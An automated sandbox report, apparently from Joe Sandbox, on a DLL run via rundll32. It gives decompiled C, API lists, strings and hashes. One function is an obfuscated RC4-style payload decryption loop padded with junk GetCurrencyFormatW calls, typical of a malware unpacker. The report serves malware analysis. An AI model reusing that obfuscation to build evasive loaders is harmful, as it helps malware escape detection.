GetCurrencyFormatW.KERNEL32 ref: 10001844
GetCurrencyFormatW.KERNEL32 ref: 10001879
GetCurrencyFormatW.KERNEL32 ref: 10001899
GetCurrencyFormatW.KERNEL32 ref: 100018BE

Strings

xadqsavcbdfewescGADW, xrefs: 1000168C, 1000169A, 1000169F, 100016BE, 100016DD, 10001705, 10001722, 1000174C, 10001765, 10001785, 100017A9, 100017D0, 100017ED, 10001813, 1000183D, 1000186C, 100018B3
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000168B, 100016A2, 100016A7, 100016C1, 100016E0, 10001708, 10001725, 1000174F, 10001768, 10001793, 100017AC, 100017D7, 100017F0, 1000181F, 10001840, 1000186F, 100018B6

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
Instruction ID: 8a616b6614b71244b568cdf68a4d548a50dd06c55d0bd6723b2e1342b5ff1104
Opcode Fuzzy Hash: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
Instruction Fuzzy Hash: 55614BB1A44315BFE204DB91CD86F1BBBECEB8AB48F111809F7409A2D1C671EA158F65

Uniqueness

Uniqueness Score: -1.00%

Function 1001DB64 Relevance: 28.9, APIs: 19, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E1001DB64(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E1001FBC4(E10034A5C, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E1001FC9C(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10020F40(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x10038ec0;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E1001BDF4(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10020F40(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1003b19c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1001DB0D(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10004D75(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1001CE04(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10004D75(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1001E0F4))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E10010B51(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E100050DA(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E10004D4A(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1001D564(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E10005422(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E10005422(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E10005422(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E100209E8(_t300 + 0x14, 0x10040d04);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E10004D4A(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10020F40(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1001E0A8))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1001CA7C(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1001CE9E(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10004D75(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1001E058))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E1000567F(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E10001260(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E10004E3A(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1001DB6B
_memset.LIBCMT ref: 1001DB93
lstrlenA.KERNEL32(?), ref: 1001DBA3
_memset.LIBCMT ref: 1001DC0D
_memset.LIBCMT ref: 1001DE23
VariantClear.OLEAUT32(?), ref: 1001DE82
VariantClear.OLEAUT32(?), ref: 1001DEAA
SysStringLen.OLEAUT32(?), ref: 1001DF04
SysFreeString.OLEAUT32(?), ref: 1001DF24
SysStringLen.OLEAUT32(?), ref: 1001DF29
SysFreeString.OLEAUT32(?), ref: 1001DF3D
SysStringLen.OLEAUT32(?), ref: 1001DF42
SysFreeString.OLEAUT32(?), ref: 1001DF56
__CxxThrowException@8.LIBCMT ref: 1001DF70
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 1001DF8E
VariantClear.OLEAUT32(?), ref: 1001DF9E

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 4128688680-0
Opcode ID: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
Instruction ID: d0b60735e7dfbc48b8ffc6b3fb26c55a134f5783589098a9cdb935b98e8b1adc
Opcode Fuzzy Hash: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
Instruction Fuzzy Hash: 77F1797090024ADFDF11EFA8D880AAEBBB5FF09340F11806AE851AB261D774DE95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 100083A5 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E100083A5() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100482fc; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x10048300 = E1000834D(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100482e0 = 0;
						 *0x100482e4 = 0;
						 *0x100482e8 = 0;
						 *0x100482ec = 0;
						 *0x100482f0 = 0;
						 *0x100482f4 = 0;
						 *0x100482f8 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100482e0 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100482e4 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100482e8 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100482ec = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100482f4 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100482f0 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100482f8 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100482fc = 1;
					return _t5;
				} else {
					_t24 =  *0x100482f0; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,75BD5D80,100084F1,?,?,?,?,?,?,?,1000A3B2,00000000,00000002,00000028), ref: 100083CE
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100083EA
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100083FB
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000840C
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000841D
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000842E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000843F
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10008450

Strings

GetSystemMetrics, xrefs: 100083E4
EnumDisplayDevicesA, xrefs: 1000844A
MonitorFromPoint, xrefs: 10008417
MonitorFromRect, xrefs: 10008406
MonitorFromWindow, xrefs: 100083F5
USER32, xrefs: 100083C4
GetMonitorInfoA, xrefs: 10008439
EnumDisplayMonitors, xrefs: 10008428

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
Instruction ID: 374b253654f9bab27aaa6d0bbf775ac5182f219bddcb8a0b2eb046c4e2c1642a
Opcode Fuzzy Hash: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
Instruction Fuzzy Hash: B5214F70901D229FE352EF294FC086EBAF4F34B281751493ED248D6221D7744241EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 10001B36 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 205
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E10001B36(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int* _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v25;
				signed int _t85;
				signed int _t94;
				signed int _t128;
				intOrPtr _t149;
				short* _t151;
				short* _t182;

				_t84 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				if(_a24 > 0) {
					_v24 = _a4 - _a12 + _a8;
					_t151 = L"xadqsavcbdfewescGADW";
					_t182 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t85 = GetCurrencyFormatW(_t84, 0x11d4, _t182, _t84, _t151, 0x22b9);
						asm("cdq");
						_v20 = (_t85 * _v24 *  *0x100440dc + _v20 + 1) % 0x4708;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20;
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v16 = (( *(_t94 * _v24 *  *0x100440d0 + _v20 + _a16) & 0x000000ff) + _v16) % 0x4708;
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16;
						_v25 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d0 + _v20 + _a16));
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16 + _a16;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20 + _a16)) =  *_v8;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v16 + _a16)) = _v25;
						_v8 =  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440cc + _v16 + _a16) & 0x000000ff;
						_t128 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v8 = (( *(_t128 * _v24 *  *0x100440cc + _v20 + _a16) & 0x000000ff) + _v8) % 0x4708;
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d8 + _v8;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v12 + _a20;
						 *_v4 =  *_v4 ^  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v8 + _a16);
						_v12 = _v12 + 1;
						_t149 = _v12;
						if(_t149 >= _a24) {
							break;
						}
						_t84 = 0;
					}
					return _t149;
				}
				return 0;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001B8A
GetCurrencyFormatW.KERNEL32 ref: 10001BB8
GetCurrencyFormatW.KERNEL32 ref: 10001BDA
GetCurrencyFormatW.KERNEL32 ref: 10001C10
GetCurrencyFormatW.KERNEL32 ref: 10001C32
GetCurrencyFormatW.KERNEL32 ref: 10001C5B
GetCurrencyFormatW.KERNEL32 ref: 10001C81
GetCurrencyFormatW.KERNEL32 ref: 10001CAC
GetCurrencyFormatW.KERNEL32 ref: 10001CD5
GetCurrencyFormatW.KERNEL32 ref: 10001CFF
GetCurrencyFormatW.KERNEL32 ref: 10001D35
GetCurrencyFormatW.KERNEL32 ref: 10001D57
GetCurrencyFormatW.KERNEL32 ref: 10001D7D

Strings

xadqsavcbdfewescGADW, xrefs: 10001B6D, 10001B85, 10001BAD, 10001BCF, 10001C05, 10001C27, 10001C50, 10001C76, 10001CA2, 10001CCB, 10001CF4, 10001D2A, 10001D4C, 10001D72
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001B72, 10001B87, 10001BB0, 10001BD2, 10001C08, 10001C2A, 10001C53, 10001C7D, 10001CA5, 10001CCE, 10001CF7, 10001D2D, 10001D4F, 10001D79

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
